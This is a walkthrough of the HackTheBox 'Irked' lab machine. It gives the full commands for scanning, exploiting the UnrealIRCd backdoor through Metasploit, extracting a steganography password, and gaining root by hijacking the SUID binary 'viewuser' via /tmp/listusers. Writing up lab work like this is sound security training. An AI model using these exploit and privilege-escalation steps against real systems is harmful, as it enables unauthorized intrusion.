HackTheBox – Irked Writeup

HackTheBox – Irked Writeup
Irked is a beginner level ctf based machine released on 17 November 2018. The machine has an UnrealIRCD server running which is vulnerable to backdoor command execution and we then hijack an SUID binary to gain root access on the machine. This machine also gives a little introduction on steganography. The machine runs on 10.10.10.117

Connecting to HTB Vpn:
1. First download the vpn file from the access page of hackthebox.eu
2. Open the .ovpn file in your terminal with the following command
openvpn yourname.ovpn
3. Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network
4. You can access the machine at 10.10.10.117
Scanning:
1. First let’s do a nmap scan on our target at 10.10.10.117
nmap -sV -A -p- 10.10.10.117
2. -sV : to get the service versions on each port
3. -A : to get information such as os details, traceroutes, ports etc
4. -p- : to scan all 65535 ports
We get the following details from our scan

Enumeration:
1. There are many ports running several services. Let us first look at the http port 80
2. The website at 10.10.10.117 greets us with a smiley image

4. First let’s do a directory scan on the web server. I am using wfuzz, you can use any directory scanner you like to do this
dirb http://10.10.10.117/
5. The directory scan just returns a manual directory which has the default apache web server files
6. From our nmap scan there is a service called UnrealIRCD running in some of the ports. So let’s try to find if there is any exploits for this service using searchsploit
searchsploit unrealircd

7. Seachsploit returns that there is a backdoor command execution exploit and that too a metasploit module. Let’s open up metasploit and search for the exploit
msfconsole
search unrealircd

Certified Ethical Hacking
Hackthebox – irked writeup gaining access:
8. Looks like this is the exploit we needed , let’s set the options of rhosts and rport to the remote machine’s ip and the port running the UnrealIRCD service and exploit the machine
use 0
show options
set rhosts 10.10.10.117
set rport 6697
exploit
9. The exploitation was successful and we got a shell on the system

Privilege escalation:
10. First let’s upgrade the shell using the below command
python -c ‘import pty; pty.spawn(“/bin/bash”)’
11. After the enumeration of many directories I found out that there is a hidden backup file inside the user djmardov’s home directory
ls -la /home/djmardov/Documents
12. Printing the hidden backup file gives us with a steg password UPupDOWNdownLRlrBAbaSSss

Steg refers to steganography which means hidden files inside other files such as images. We have noticed a smiley image on the web server, so lets download that image and do a steg analysis on it
13. There is a tool called steghide which is used to hide and recover hidden files from images. So let’s use that on the image
steghide extract -sf irked.png

When it asks for the password, enter the password we got from the backup file. Now we can see that there was a hidden file called pass.txt inside the image and it has been extracted to our system

14. The pass.txt provides us with another password. So this must the password of the user djmardov. Let’s switch user to djmardow using the password su djmardov
15. Now we are able to read the user flag in the home directory
16. Run the below command to see SUID binary files which can be used for privilege escalation to root
find / -perm -u=s -type f 2>/dev/null

17. In the list of binaries returned there is an odd binary called viewuser. Let’s try running that
viewuser

18. The binary produces an error saying /tmp/listusers is not found. So let’s create a file called listusers in the temp directory and give it executable permissions
touch /tmp/listusers
chmod +x /tmp/listusers
19. Now when we run the viewuser command there is no error. Since viewuser is an SUID binary let’s insert a bash command to /tmp/listusers and see if it gets executed
echo bash > /tmp/listusers

20. After running the viewuser command again we can see that we managed to gain root access to the machine
Don’t forget to check out our latest Blogs – HackTheBox – Jerry Writeup